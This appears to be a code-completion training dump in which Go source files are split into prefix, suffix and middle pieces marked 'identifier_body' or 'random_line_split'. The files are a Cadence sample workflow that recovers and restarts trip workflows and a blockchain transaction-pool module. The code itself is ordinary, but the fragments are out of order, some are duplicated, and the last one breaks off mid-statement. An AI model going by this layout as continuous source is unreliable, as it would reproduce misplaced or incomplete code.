switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionStarted:
attr := event.WorkflowExecutionStartedEventAttributes
state, err := deserializeUserState(attr.Input)
if err != nil {
// Corrupted Workflow Execution State
return nil, err
}
return &RestartParams{
Options: client.StartWorkflowOptions{
ID: workflowID,
TaskList: attr.TaskList.GetName(),
ExecutionStartToCloseTimeout: time.Second * time.Duration(attr.GetExecutionStartToCloseTimeoutSeconds()),
DecisionTaskStartToCloseTimeout: time.Second * time.Duration(attr.GetTaskStartToCloseTimeoutSeconds()),
WorkflowIDReusePolicy: client.WorkflowIDReusePolicyAllowDuplicate,
//RetryPolicy: attr.RetryPolicy,
},
State: state,
}, nil
default:
return nil, errors.New("Unknown event type")
}
} | identifier_body |
recovery_workflow.go | package main
import (
"context"
"errors"
"time"
"github.com/pborman/uuid"
"go.uber.org/cadence"
"go.uber.org/cadence/.gen/go/shared"
"go.uber.org/cadence/activity"
"go.uber.org/cadence/client"
"go.uber.org/cadence/workflow"
"go.uber.org/zap"
"github.com/uber-common/cadence-samples/cmd/samples/common"
"github.com/uber-common/cadence-samples/cmd/samples/recovery/cache"
)
type (
// Params is the input parameters to RecoveryWorkflow
Params struct {
ID string
Type string
Concurrency int
}
// ListOpenExecutionsResult is the result returned from listOpenExecutions activity
ListOpenExecutionsResult struct {
ID string
Count int
HostID string
}
// RestartParams are parameters extracted from StartWorkflowExecution history event
RestartParams struct {
Options client.StartWorkflowOptions
State UserState
}
// SignalParams are the parameters extracted from SignalWorkflowExecution history event
SignalParams struct {
Name string
Data TripEvent
}
)
// ClientKey is the key for lookup
type ClientKey int
const (
// DomainName used for this sample
DomainName = "samples-domain"
// CadenceClientKey for retrieving cadence client from context
CadenceClientKey ClientKey = iota
// WorkflowExecutionCacheKey for retrieving executions cache from context
WorkflowExecutionCacheKey
)
// HostID - Use a new uuid just for demo so we can run 2 host specific activity workers on same machine.
// In real world case, you would use a hostname or ip address as HostID.
var HostID = uuid.New()
var (
// ErrCadenceClientNotFound when cadence client is not found on context
ErrCadenceClientNotFound = errors.New("failed to retrieve cadence client from context")
// ErrExecutionCacheNotFound when executions cache is not found on context
ErrExecutionCacheNotFound = errors.New("failed to retrieve cache from context")
)
// This is registration process where you register all your workflows
// and activity function handlers.
func init() {
workflow.RegisterWithOptions(recoverWorkflow, workflow.RegisterOptions{Name: "recoverWorkflow"})
activity.Register(listOpenExecutions)
activity.Register(recoverExecutions)
}
// recoverWorkflow is the workflow implementation to recover TripWorkflow executions
func recoverWorkflow(ctx workflow.Context, params Params) error {
logger := workflow.GetLogger(ctx)
logger.Info("Recover workflow started.")
ao := workflow.ActivityOptions{
ScheduleToStartTimeout: 10 * time.Minute,
StartToCloseTimeout: 10 * time.Minute,
HeartbeatTimeout: time.Second * 30,
}
ctx = workflow.WithActivityOptions(ctx, ao)
var result ListOpenExecutionsResult
err := workflow.ExecuteActivity(ctx, listOpenExecutions, params.Type).Get(ctx, &result)
if err != nil {
logger.Error("Failed to list open workflow executions.", zap.Error(err))
return err
}
concurrency := 1
if params.Concurrency > 0 {
concurrency = params.Concurrency
}
if result.Count < concurrency {
concurrency = result.Count
}
batchSize := result.Count / concurrency
if result.Count%concurrency != 0 {
batchSize++
}
// Setup retry policy for recovery activity
info := workflow.GetInfo(ctx)
expiration := time.Duration(info.ExecutionStartToCloseTimeoutSeconds) * time.Second
retryPolicy := &cadence.RetryPolicy{
InitialInterval: time.Second,
BackoffCoefficient: 2,
MaximumInterval: 10 * time.Second,
ExpirationInterval: expiration,
MaximumAttempts: 100,
}
ao = workflow.ActivityOptions{
ScheduleToStartTimeout: expiration,
StartToCloseTimeout: expiration,
HeartbeatTimeout: time.Second * 30,
RetryPolicy: retryPolicy,
}
ctx = workflow.WithActivityOptions(ctx, ao)
doneCh := workflow.NewChannel(ctx)
for i := 0; i < concurrency; i++ {
startIndex := i * batchSize
workflow.Go(ctx, func(ctx workflow.Context) {
err = workflow.ExecuteActivity(ctx, recoverExecutions, result.ID, startIndex, batchSize).Get(ctx, nil)
if err != nil {
logger.Error("Recover executions failed.", zap.Int("StartIndex", startIndex), zap.Error(err))
} else {
logger.Info("Recover executions completed.", zap.Int("StartIndex", startIndex))
}
doneCh.Send(ctx, "done")
})
}
for i := 0; i < concurrency; i++ {
doneCh.Receive(ctx, nil)
}
logger.Info("Workflow completed.", zap.Int("Result", result.Count))
return nil
}
func listOpenExecutions(ctx context.Context, workflowType string) (*ListOpenExecutionsResult, error) {
key := uuid.New()
logger := activity.GetLogger(ctx)
logger.Info("List all open executions of type.",
zap.String("WorkflowType", workflowType),
zap.String("HostID", HostID))
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return nil, ErrExecutionCacheNotFound
}
openExecutions, err := getAllExecutionsOfType(ctx, cadenceClient, workflowType)
if err != nil {
return nil, err
}
executionsCache.Put(key, openExecutions)
return &ListOpenExecutionsResult{
ID: key,
Count: len(openExecutions),
HostID: HostID,
}, nil
}
func recoverExecutions(ctx context.Context, key string, startIndex, batchSize int) error {
logger := activity.GetLogger(ctx)
logger.Info("Starting execution recovery.",
zap.String("HostID", HostID),
zap.String("Key", key),
zap.Int("StartIndex", startIndex),
zap.Int("BatchSize", batchSize))
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return ErrExecutionCacheNotFound
}
openExecutions := executionsCache.Get(key).([]*shared.WorkflowExecution)
endIndex := startIndex + batchSize
// Check if this activity has previous heartbeat to retrieve progress from it
if activity.HasHeartbeatDetails(ctx) {
var finishedIndex int
if err := activity.GetHeartbeatDetails(ctx, &finishedIndex); err == nil {
// we have finished progress
startIndex = finishedIndex + 1 // start from next one.
}
}
for index := startIndex; index < endIndex && index < len(openExecutions); index++ {
execution := openExecutions[index]
if err := recoverSingleExecution(ctx, execution.GetWorkflowId()); err != nil {
logger.Error("Failed to recover execution.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.Error(err))
return err
}
// Record a heartbeat after each recovery of execution
activity.RecordHeartbeat(ctx, index)
}
| }
func recoverSingleExecution(ctx context.Context, workflowID string) error {
logger := activity.GetLogger(ctx)
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return err
}
execution := &shared.WorkflowExecution{
WorkflowId: common.StringPtr(workflowID),
}
history, err := getHistory(ctx, execution)
if err != nil {
return err
}
if history == nil || len(history) == 0 {
// Nothing to recover
return nil
}
firstEvent := history[0]
lastEvent := history[len(history)-1]
// Extract information from StartWorkflowExecution parameters so we can start a new run
params, err := extractStateFromEvent(workflowID, firstEvent)
if err != nil {
return err
}
// Parse the entire history and extract all signals so they can be replayed back to new run
signals, err := extractSignals(history)
if err != nil {
return err
}
// First terminate existing run if already running
if !isExecutionCompleted(lastEvent) {
err := cadenceClient.TerminateWorkflow(ctx, execution.GetWorkflowId(), execution.GetRunId(), "Recover", nil)
if err != nil {
return err
}
}
// Start new execution run
newRun, err := cadenceClient.StartWorkflow(ctx, params.Options, "TripWorkflow", params.State)
if err != nil {
return err
}
// re-inject all signals to new run
for _, s := range signals {
cadenceClient.SignalWorkflow(ctx, execution.GetWorkflowId(), newRun.RunID, s.Name, s.Data)
}
logger.Info("Successfully restarted workflow.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.String("NewRunID", newRun.RunID))
return nil
}
func extractStateFromEvent(workflowID string, event *shared.HistoryEvent) (*RestartParams, error) {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionStarted:
attr := event.WorkflowExecutionStartedEventAttributes
state, err := deserializeUserState(attr.Input)
if err != nil {
// Corrupted Workflow Execution State
return nil, err
}
return &RestartParams{
Options: client.StartWorkflowOptions{
ID: workflowID,
TaskList: attr.TaskList.GetName(),
ExecutionStartToCloseTimeout: time.Second * time.Duration(attr.GetExecutionStartToCloseTimeoutSeconds()),
DecisionTaskStartToCloseTimeout: time.Second * time.Duration(attr.GetTaskStartToCloseTimeoutSeconds()),
WorkflowIDReusePolicy: client.WorkflowIDReusePolicyAllowDuplicate,
//RetryPolicy: attr.RetryPolicy,
},
State: state,
}, nil
default:
return nil, errors.New("Unknown event type")
}
}
func extractSignals(events []*shared.HistoryEvent) ([]*SignalParams, error) {
var signals []*SignalParams
for _, event := range events {
if event.GetEventType() == shared.EventTypeWorkflowExecutionSignaled {
attr := event.WorkflowExecutionSignaledEventAttributes
if attr.GetSignalName() == TripSignalName && attr.Input != nil && len(attr.Input) > 0 {
signalData, err := deserializeTripEvent(attr.Input)
if err != nil {
// Corrupted Signal Payload
return nil, err
}
signal := &SignalParams{
Name: attr.GetSignalName(),
Data: signalData,
}
signals = append(signals, signal)
}
}
}
return signals, nil
}
func isExecutionCompleted(event *shared.HistoryEvent) bool {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionCompleted, shared.EventTypeWorkflowExecutionTerminated,
shared.EventTypeWorkflowExecutionCanceled, shared.EventTypeWorkflowExecutionFailed,
shared.EventTypeWorkflowExecutionTimedOut:
return true
default:
return false
}
}
func getAllExecutionsOfType(ctx context.Context, cadenceClient client.Client,
workflowType string) ([]*shared.WorkflowExecution, error) {
var openExecutions []*shared.WorkflowExecution
var nextPageToken []byte
for hasMore := true; hasMore; hasMore = len(nextPageToken) > 0 {
resp, err := cadenceClient.ListOpenWorkflow(ctx, &shared.ListOpenWorkflowExecutionsRequest{
Domain: common.StringPtr(DomainName),
MaximumPageSize: common.Int32Ptr(10),
NextPageToken: nextPageToken,
StartTimeFilter: &shared.StartTimeFilter{
EarliestTime: common.Int64Ptr(0),
LatestTime: common.Int64Ptr(time.Now().UnixNano()),
},
TypeFilter: &shared.WorkflowTypeFilter{
Name: common.StringPtr(workflowType),
},
})
if err != nil {
return nil, err
}
for _, r := range resp.Executions {
openExecutions = append(openExecutions, r.Execution)
}
nextPageToken = resp.NextPageToken
activity.RecordHeartbeat(ctx, nextPageToken)
}
return openExecutions, nil
}
func getHistory(ctx context.Context, execution *shared.WorkflowExecution) ([]*shared.HistoryEvent, error) {
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
iter := cadenceClient.GetWorkflowHistory(ctx, execution.GetWorkflowId(), execution.GetRunId(), false,
shared.HistoryEventFilterTypeAllEvent)
var events []*shared.HistoryEvent
for iter.HasNext() {
event, err := iter.Next()
if err != nil {
return nil, err
}
events = append(events, event)
}
return events, nil
}
func getCadenceClientFromContext(ctx context.Context) (client.Client, error) {
logger := activity.GetLogger(ctx)
cadenceClient := ctx.Value(CadenceClientKey).(client.Client)
if cadenceClient == nil {
logger.Error("Could not retrieve cadence client from context.")
return nil, ErrCadenceClientNotFound
}
return cadenceClient, nil
} | return nil | random_line_split |
tx_pool.go | package mainchain
import (
"fmt"
"sort"
"sync"
"time"
"github.com/sixexorg/magnetic-ring/bactor"
"github.com/sixexorg/magnetic-ring/config"
"github.com/sixexorg/magnetic-ring/log"
"github.com/ontio/ontology-eventbus/actor"
"github.com/sixexorg/magnetic-ring/common"
"github.com/sixexorg/magnetic-ring/core/mainchain/types"
"github.com/sixexorg/magnetic-ring/errors"
"github.com/sixexorg/magnetic-ring/radar/mainchain"
"github.com/sixexorg/magnetic-ring/store/mainchain/states"
"github.com/sixexorg/magnetic-ring/store/mainchain/storages"
"github.com/sixexorg/magnetic-ring/store/mainchain/validation"
)
var (
mainTxPool *TxPool
)
type TxPool struct {
pdmgr *PendingMgr
//queue *TxQueue
waitTxNum map[common.Hash]uint8
waitPool types.Transactions
txChan chan *types.Transaction
maxPending uint32
maxInPending uint32
maxInQueue uint32
stateValidator *validation.StateValidate
ticker *time.Ticker
txpoolPid *actor.PID
mustPackTxs []*types.Transaction
mainRadar *mainchain.LeagueConsumers
}
func NewTxPool() *TxPool {
pool := new(TxPool)
pool.pdmgr = NewPendingMgr()
//pool.queue = NewTxQueue()
pool.maxPending = config.GlobalConfig.TxPoolCfg.MaxPending
pool.maxInPending = config.GlobalConfig.TxPoolCfg.MaxInPending
pool.maxInQueue = config.GlobalConfig.TxPoolCfg.MaxInQueue
pool.txChan = make(chan *types.Transaction, pool.maxInQueue)
pool.RefreshValidator()
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
pool.mustPackTxs = make([]*types.Transaction, 0)
return pool
}
func (pool *TxPool) SetMainRadar(mainRadar *mainchain.LeagueConsumers) {
pool.mainRadar = mainRadar
}
func (pool *TxPool) AppendMustPackTx(txs ...*types.Transaction) {
for _, tx := range txs {
pool.mustPackTxs = append(pool.mustPackTxs, tx)
}
}
type PendingMgr struct {
sync.RWMutex
pendingTxs map[common.Hash]*types.Transaction
}
func InitPool() (*TxPool, error) {
var err error
mainTxPool, err = InitTxPool()
if err != nil {
return nil, err
}
mainTxPool.Start()
return mainTxPool, nil
}
func GetPool() (*TxPool, error) {
if mainTxPool == nil {
return nil, errors.ERR_TXPOOL_UNINIT
}
return mainTxPool, nil
}
func (pool *TxPool) Start() {
pool.RefreshValidator()
go func() {
for {
select {
case tx := <-pool.txChan:
//if !pool.queue.IsEmpty() {
//tx = pool.queue.Dequeue()
err := pool.AddTx(tx)
if err != nil {
fmt.Printf("addtx and validate error=%v\n", err)
log.Info("addtx error", "error", err, "targetBlockHeight", pool.stateValidator.TargetHeight, "errors.ERR_TXPOOL_OUTOFMAX", pool.maxInQueue, "len(pool.txChan)", len(pool.txChan))
}
//}
}
}
}()
}
func startActor(obj interface{}, id string) (*actor.PID, error) {
props := actor.FromProducer(func() actor.Actor {
return obj.(actor.Actor)
})
pid, _ := actor.SpawnNamed(props, id)
if pid == nil {
return nil, fmt.Errorf("fail to start actor at props:%v id:%s", props, id)
}
return pid, nil
}
func InitTxPool() (*TxPool, error) |
func (pool *TxPool) refreshWaitPool() {
if pool.waitPool.Len() > 0 {
for k, _ := range pool.waitPool {
pool.TxEnqueue(pool.waitPool[k])
}
}
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
}
func (pool *TxPool) RefreshValidator() {
if pool != nil && pool.stateValidator != nil {
//log.Info("func txpool RefreshValidator 01", "oldTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 01 ", "oldTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
ledgerStore := storages.GetLedgerStore()
if ledgerStore == nil {
return
}
oldSV := pool.stateValidator
pool.stateValidator = validation.NewStateValidate(ledgerStore)
if oldSV != nil {
txch := oldSV.TxInheritance()
for ch := range txch {
pool.TxEnqueue(ch)
}
}
pool.refreshWaitPool()
//log.Info("func txpool RefreshValidator 02", "newTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 02 ", "newTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
func (pool *TxPool) AddTx(tx *types.Transaction) error {
result, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
return err
}
txHash := tx.Hash()
switch result {
case -1:
return err
case 0: //
if uint32(len(pool.txChan)) < pool.maxInQueue {
pool.waitTxNum[txHash]++
if uint32(pool.waitTxNum[txHash]) == config.GlobalConfig.TxPoolCfg.MaxTxInPool { // 下一个块在考虑 尝试四次都失败后执行
pool.waitPool = append(pool.waitPool, tx)
} else if uint32(pool.waitTxNum[txHash]) < config.GlobalConfig.TxPoolCfg.MaxTxInPool {
pool.txChan <- tx
}
} else {
return errors.ERR_TXPOOL_OUTOFMAX
}
return nil
case 1: //
fmt.Printf("validate tx success,txhash=%s\n", txHash.String())
p2ppid, err := bactor.GetActorPid(bactor.P2PACTOR)
if err != nil {
log.Error("tx_pool.go get p2ppid error", "error", err)
} else {
p2ppid.Tell(tx)
}
pool.pdmgr.addTx(tx, pool.maxPending)
return nil
}
return nil
}
func (pool *TxPool) GetTxpoolPID() *actor.PID {
return pool.txpoolPid
}
func (pool *TxPool) TxEnqueue(tx *types.Transaction) error {
log.Info("magnetic try to enqueue", "tx", tx, "queue.size", len(pool.txChan))
//if uint32(pool.queue.Size()) >= pool.maxInQueue {
// return errors.ERR_TXPOOL_OUTOFMAX
//}
if uint32(len(pool.txChan)) >= pool.maxInQueue {
return errors.ERR_TXPOOL_OUTOFMAX
}
log.Info("magnetic enqueue success", "tx", tx, "queue.size", len(pool.txChan))
//pool.queue.Enqueue(tx)
pool.txChan <- tx
return nil
}
/**
generate block
*/
func (pool *TxPool) GenerateBlock(height uint64, packtx bool) *types.Block {
//pool.ticker.Stop()
sts := states.AccountStates{}
var txs *types.Transactions
if packtx {
txs = pool.pdmgr.getTxs(pool.maxPending)
if txs != nil && txs.Len() > 0 {
sort.Sort(txs)
}
}
var txsroot common.Hash
var txns types.Transactions
if txs != nil {
txsroot = txs.GetHashRoot()
txns = *txs
}
block := &types.Block{
Header: &types.Header{
Height: height + 1,
Version: types.TxVersion,
PrevBlockHash: storages.GetLedgerStore().GetCurrentBlockHash(),
LeagueRoot: common.Hash{},
ReceiptsRoot: common.Hash{},
TxRoot: txsroot,
StateRoot: sts.GetHashRoot(),
Timestamp: uint64(time.Now().Unix()),
},
Transactions: txns,
}
return block
}
func (pool *TxPool) ValidateSyncTxs(txhashes []*common.Hash) error {
if pool.pdmgr.pendingTxs == nil || len(pool.pdmgr.pendingTxs) < 1 {
return errors.ERR_TXPOOL_TXNOTFOUND
}
//for _, v := range txhashes {
//vtx := pool.queue.Remove(*v)
//if vtx == nil {
// return errors.ERR_TXPOOL_TXNOTFOUND
//}
//result, err := pool.stateValidator.VerifyTx(vtx)
//
//switch result {
//case -1:
// return err
//case 0:
// if uint32(pool.queue.Size()) < pool.maxInQueue {
// pool.queue.Enqueue(vtx)
// } else {
// return errors.ERR_TXPOOL_OUTOFMAX
// }
// return nil
//case 1:
// pool.pdmgr.addTx(vtx, pool.maxPending)
// return nil
//}
//}
return nil
}
func (pool *TxPool) Execute() *storages.BlockInfo {
log.Info("func txpool Execute", "targetHeight", pool.stateValidator.TargetHeight)
/*for _, tx := range pool.mustPackTxs {
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
}*/
objectiveTxs, err := pool.mainRadar.GenerateMainTxs()
if err != nil {
log.Error("GenerateMainTxs failed", "error", err)
}
for _, tx := range objectiveTxs {
if validation.AutoNonceContains(tx.TxType) {
nonce := validation.AccountNonceInstance.GetAccountNonce(tx.TxData.From)
tx.TxData.Nonce = nonce + 1
validation.AccountNonceInstance.SetNonce(tx.TxData.From, nonce+1)
fmt.Println("🚰 Execute txhash", tx.TxData.LeagueId.ToString())
}
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
if ret != 1 {
fmt.Println("🚰 🚰 🚰 objTx verify failed!!! result:", ret, tx.TxType)
}
if tx.TxType == types.ConsensusLeague {
fmt.Printf("🚰 🚰 🚰 ♋️ leagueId:%s startheight:%d endheight:%d energy:%s blockroot:%s\n",
tx.TxData.LeagueId.ToString(),
tx.TxData.StartHeight,
tx.TxData.EndHeight,
tx.TxData.Energy.String(),
tx.TxData.BlockRoot.String())
}
}
return pool.stateValidator.ExecuteOplogs()
}
func (pool *TxPool) RemovePendingTxs(hashes []common.Hash) {
pool.pdmgr.removePendingTxs(hashes)
}
func NewPendingMgr() *PendingMgr {
mgr := new(PendingMgr)
mgr.pendingTxs = make(map[common.Hash]*types.Transaction)
return mgr
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) getTxs(maxInblock uint32) *types.Transactions {
pm.Lock()
defer pm.Unlock()
if len(pm.pendingTxs) < 1 {
return nil
}
txs := make(types.Transactions, 0)
for _, v := range pm.pendingTxs {
txs = append(txs, v)
}
sort.Sort(txs)
le := uint32(len(txs))
if le > maxInblock {
le = maxInblock
}
ret := txs[0:le]
return &ret
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) removePendingTxs(txhashes []common.Hash) {
pm.RLock()
defer pm.RUnlock()
if pm.pendingTxs == nil || len(pm.pendingTxs) < 1 {
return
}
for _, v := range txhashes {
delete(pm.pendingTxs, v)
}
}
/*
add tx to pending transaction list
*/
func (pm *PendingMgr) addTx(tx *types.Transaction, maxPending uint32) error {
pm.Lock()
defer pm.Unlock()
if uint32(len(pm.pendingTxs)) > maxPending {
return errors.ERR_TXPOOL_OUTOFMAX
}
pm.pendingTxs[tx.Hash()] = tx
return nil
}
| {
pool := NewTxPool()
poolActor := NewTxActor(pool)
pid, err := startActor(poolActor, "txpoolAcotor")
if err != nil {
return nil, err
}
bactor.RegistActorPid(bactor.TXPOOLACTOR, pid)
pool.txpoolPid = pid
return pool, nil
} | identifier_body |
tx_pool.go | package mainchain
import (
"fmt"
"sort"
"sync"
"time"
"github.com/sixexorg/magnetic-ring/bactor"
"github.com/sixexorg/magnetic-ring/config"
"github.com/sixexorg/magnetic-ring/log"
"github.com/ontio/ontology-eventbus/actor"
"github.com/sixexorg/magnetic-ring/common"
"github.com/sixexorg/magnetic-ring/core/mainchain/types"
"github.com/sixexorg/magnetic-ring/errors"
"github.com/sixexorg/magnetic-ring/radar/mainchain"
"github.com/sixexorg/magnetic-ring/store/mainchain/states"
"github.com/sixexorg/magnetic-ring/store/mainchain/storages"
"github.com/sixexorg/magnetic-ring/store/mainchain/validation"
)
var (
mainTxPool *TxPool
)
type TxPool struct {
pdmgr *PendingMgr
//queue *TxQueue
waitTxNum map[common.Hash]uint8
waitPool types.Transactions
txChan chan *types.Transaction
maxPending uint32
maxInPending uint32
maxInQueue uint32
stateValidator *validation.StateValidate
ticker *time.Ticker
txpoolPid *actor.PID
mustPackTxs []*types.Transaction
mainRadar *mainchain.LeagueConsumers
}
func NewTxPool() *TxPool {
pool := new(TxPool)
pool.pdmgr = NewPendingMgr()
//pool.queue = NewTxQueue()
pool.maxPending = config.GlobalConfig.TxPoolCfg.MaxPending
pool.maxInPending = config.GlobalConfig.TxPoolCfg.MaxInPending
pool.maxInQueue = config.GlobalConfig.TxPoolCfg.MaxInQueue
pool.txChan = make(chan *types.Transaction, pool.maxInQueue)
pool.RefreshValidator()
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
pool.mustPackTxs = make([]*types.Transaction, 0)
return pool
}
func (pool *TxPool) SetMainRadar(mainRadar *mainchain.LeagueConsumers) {
pool.mainRadar = mainRadar
}
func (pool *TxPool) AppendMustPackTx(txs ...*types.Transaction) {
for _, tx := range txs {
pool.mustPackTxs = append(pool.mustPackTxs, tx)
}
}
type PendingMgr struct {
sync.RWMutex
pendingTxs map[common.Hash]*types.Transaction
}
func InitPool() (*TxPool, error) {
var err error
mainTxPool, err = InitTxPool()
if err != nil {
return nil, err
}
mainTxPool.Start()
return mainTxPool, nil
}
func GetPool() (*TxPool, error) {
if mainTxPool == nil {
return nil, errors.ERR_TXPOOL_UNINIT
}
return mainTxPool, nil
}
func (pool *TxPool) Start() {
pool.RefreshValidator()
go func() {
for {
select {
case tx := <-pool.txChan:
//if !pool.queue.IsEmpty() {
//tx = pool.queue.Dequeue()
err := pool.AddTx(tx)
if err != nil {
fmt.Printf("addtx and validate error=%v\n", err)
log.Info("addtx error", "error", err, "targetBlockHeight", pool.stateValidator.TargetHeight, "errors.ERR_TXPOOL_OUTOFMAX", pool.maxInQueue, "len(pool.txChan)", len(pool.txChan))
}
//}
}
}
}()
}
func startActor(obj interface{}, id string) (*actor.PID, error) {
props := actor.FromProducer(func() actor.Actor {
return obj.(actor.Actor)
})
pid, _ := actor.SpawnNamed(props, id)
if pid == nil {
return nil, fmt.Errorf("fail to start actor at props:%v id:%s", props, id)
}
return pid, nil
}
func InitTxPool() (*TxPool, error) {
pool := NewTxPool()
poolActor := NewTxActor(pool)
pid, err := startActor(poolActor, "txpoolAcotor")
if err != nil {
return nil, err
}
bactor.RegistActorPid(bactor.TXPOOLACTOR, pid)
pool.txpoolPid = pid
return pool, nil
}
func (pool *TxPool) refreshWaitPool() {
if pool.waitPool.Len() > 0 {
for k, _ := range pool.waitPool {
pool.TxEnqueue(pool.waitPool[k])
}
}
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
}
func (pool *TxPool) RefreshValidator() {
if pool != nil && pool.stateValidator != nil {
//log.Info("func txpool RefreshValidator 01", "oldTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 01 ", "oldTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
ledgerStore := storages.GetLedgerStore()
if ledgerStore == nil {
return
}
oldSV := pool.stateValidator
pool.stateValidator = validation.NewStateValidate(ledgerStore)
if oldSV != nil {
txch := oldSV.TxInheritance()
for ch := range txch |
}
pool.refreshWaitPool()
//log.Info("func txpool RefreshValidator 02", "newTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 02 ", "newTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
func (pool *TxPool) AddTx(tx *types.Transaction) error {
result, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
return err
}
txHash := tx.Hash()
switch result {
case -1:
return err
case 0: //
if uint32(len(pool.txChan)) < pool.maxInQueue {
pool.waitTxNum[txHash]++
if uint32(pool.waitTxNum[txHash]) == config.GlobalConfig.TxPoolCfg.MaxTxInPool { // 下一个块在考虑 尝试四次都失败后执行
pool.waitPool = append(pool.waitPool, tx)
} else if uint32(pool.waitTxNum[txHash]) < config.GlobalConfig.TxPoolCfg.MaxTxInPool {
pool.txChan <- tx
}
} else {
return errors.ERR_TXPOOL_OUTOFMAX
}
return nil
case 1: //
fmt.Printf("validate tx success,txhash=%s\n", txHash.String())
p2ppid, err := bactor.GetActorPid(bactor.P2PACTOR)
if err != nil {
log.Error("tx_pool.go get p2ppid error", "error", err)
} else {
p2ppid.Tell(tx)
}
pool.pdmgr.addTx(tx, pool.maxPending)
return nil
}
return nil
}
func (pool *TxPool) GetTxpoolPID() *actor.PID {
return pool.txpoolPid
}
func (pool *TxPool) TxEnqueue(tx *types.Transaction) error {
log.Info("magnetic try to enqueue", "tx", tx, "queue.size", len(pool.txChan))
//if uint32(pool.queue.Size()) >= pool.maxInQueue {
// return errors.ERR_TXPOOL_OUTOFMAX
//}
if uint32(len(pool.txChan)) >= pool.maxInQueue {
return errors.ERR_TXPOOL_OUTOFMAX
}
log.Info("magnetic enqueue success", "tx", tx, "queue.size", len(pool.txChan))
//pool.queue.Enqueue(tx)
pool.txChan <- tx
return nil
}
/**
generate block
*/
func (pool *TxPool) GenerateBlock(height uint64, packtx bool) *types.Block {
//pool.ticker.Stop()
sts := states.AccountStates{}
var txs *types.Transactions
if packtx {
txs = pool.pdmgr.getTxs(pool.maxPending)
if txs != nil && txs.Len() > 0 {
sort.Sort(txs)
}
}
var txsroot common.Hash
var txns types.Transactions
if txs != nil {
txsroot = txs.GetHashRoot()
txns = *txs
}
block := &types.Block{
Header: &types.Header{
Height: height + 1,
Version: types.TxVersion,
PrevBlockHash: storages.GetLedgerStore().GetCurrentBlockHash(),
LeagueRoot: common.Hash{},
ReceiptsRoot: common.Hash{},
TxRoot: txsroot,
StateRoot: sts.GetHashRoot(),
Timestamp: uint64(time.Now().Unix()),
},
Transactions: txns,
}
return block
}
func (pool *TxPool) ValidateSyncTxs(txhashes []*common.Hash) error {
if pool.pdmgr.pendingTxs == nil || len(pool.pdmgr.pendingTxs) < 1 {
return errors.ERR_TXPOOL_TXNOTFOUND
}
//for _, v := range txhashes {
//vtx := pool.queue.Remove(*v)
//if vtx == nil {
// return errors.ERR_TXPOOL_TXNOTFOUND
//}
//result, err := pool.stateValidator.VerifyTx(vtx)
//
//switch result {
//case -1:
// return err
//case 0:
// if uint32(pool.queue.Size()) < pool.maxInQueue {
// pool.queue.Enqueue(vtx)
// } else {
// return errors.ERR_TXPOOL_OUTOFMAX
// }
// return nil
//case 1:
// pool.pdmgr.addTx(vtx, pool.maxPending)
// return nil
//}
//}
return nil
}
func (pool *TxPool) Execute() *storages.BlockInfo {
log.Info("func txpool Execute", "targetHeight", pool.stateValidator.TargetHeight)
/*for _, tx := range pool.mustPackTxs {
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
}*/
objectiveTxs, err := pool.mainRadar.GenerateMainTxs()
if err != nil {
log.Error("GenerateMainTxs failed", "error", err)
}
for _, tx := range objectiveTxs {
if validation.AutoNonceContains(tx.TxType) {
nonce := validation.AccountNonceInstance.GetAccountNonce(tx.TxData.From)
tx.TxData.Nonce = nonce + 1
validation.AccountNonceInstance.SetNonce(tx.TxData.From, nonce+1)
fmt.Println("🚰 Execute txhash", tx.TxData.LeagueId.ToString())
}
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
if ret != 1 {
fmt.Println("🚰 🚰 🚰 objTx verify failed!!! result:", ret, tx.TxType)
}
if tx.TxType == types.ConsensusLeague {
fmt.Printf("🚰 🚰 🚰 ♋️ leagueId:%s startheight:%d endheight:%d energy:%s blockroot:%s\n",
tx.TxData.LeagueId.ToString(),
tx.TxData.StartHeight,
tx.TxData.EndHeight,
